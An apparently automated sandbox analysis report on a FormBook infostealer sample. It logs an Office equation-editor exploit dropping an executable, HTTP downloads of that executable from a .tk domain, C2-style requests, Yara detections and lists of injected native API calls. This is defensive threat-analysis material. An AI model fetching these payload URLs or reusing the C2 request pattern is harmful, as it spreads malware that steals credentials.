          Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D3778CDA-961A-4F4E-A09E-6641E3AF482B}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: fantecheo.tk
          Source: global trafficHTTP traffic detected: GET /ibefrankzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fantecheo.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /if60/?L0Gd9F=rhh0xc6OYmH3Bp2G4X501Z0vOdzBEjh/MlQjf2DAfTSCIAGZoC8T5uMa8yxQ1kiGUtDxZg==&fDKt=ndxXaN5XDzkTz HTTP/1.1Host: www.lazyguysmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exeJump to dropped file
          .NET source code contains very large stringsShow sources
          Source: ibefrankzx[1].exe.2.dr, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
          Source: ibefrankhq4862.exe.2.dr, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
          Source: 4.0.ibefrankhq4862.exe.13a0000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
          Source: 4.2.ibefrankhq4862.exe.13a0000.2.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
          Source: 5.0.ibefrankhq4862.exe.13a0000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
          Source: 5.2.ibefrankhq4862.exe.13a0000.5.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
          Source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4_2_002869C9
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4_2_00286D30
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4_2_002890A8
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4_2_00A46998
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4_2_00A4936F
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4_2_00A401F9
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4_2_00A45DC8
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4_2_00A45DD8
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4_2_002800F0
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00401030
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041D963
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00402D8B
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00402D90
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041E5B0
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00409E4B
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00409E50
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041EE3B
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041EF5C
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0086E0C6
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0089D005
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00873040
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0088905A
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0086E2E9
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00911238
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0086F3CF
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_008963DB
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00872305
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00877353
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_008BA37B
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00881489
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_008A5485
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0088C5F0
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0087351F
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00874680
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0087E6C1
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00912622
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_008F579A
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0087C7BC
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_008A57C3
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0090F8EE
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0087C85C
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0089286D
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0091098E
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_008729B2
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_008869FE
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_008F5955
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00923A83
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0091CBA4
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0086FBD7
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_008FDBDA
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00897B00
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02551238
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024AE2E9
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024B7353
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024FA37B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024B2305
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024AF3CF
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024D63DB
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024B3040
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024C905A
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024DD005
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024AE0C6
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02552622
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024BE6C1
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024B4680
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024E57C3
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253579A
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024BC7BC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024C1489
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024E5485
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024B351F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024CC5F0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02563A83
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024D7B00
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0253DBDA
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024AFBD7
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0255CBA4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024BC85C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024D286D
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0254F8EE
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_02535955
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024C69FE
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0255098E
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024B29B2
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024CEE4C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024E2E2F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024DDF7C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024C0F3F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024BCD5B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024E0D3B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0254FDDD
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FE5B0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2D8B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2D90
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FEE3B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E9E4B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E9E50
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000FEF5C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_000E2FB0
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: String function: 008DF970 appears 69 times
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: String function: 0086E2A8 appears 31 times
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: String function: 008B373B appears 185 times
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: String function: 008B3F92 appears 72 times
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: String function: 0086DF5C appears 88 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 024F373B appears 238 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 024F3F92 appears 108 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 024AE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 0251F970 appears 81 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 024ADF5C appears 107 times
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041A350 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041A400 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041A480 NtClose,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041A530 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041A34A NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041A3A3 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041A47A NtClose,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0041A52B NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_008600C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00860048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00860078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_008610D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00860060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_008601D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0086010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00861148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_008607AC NtCreateMutant,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_00861930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085F938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 5_2_0085FB50 NtCreateKey,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024A00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_024A07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_0249FC60 NtMapViewOfSection,LdrInitializeThunk,
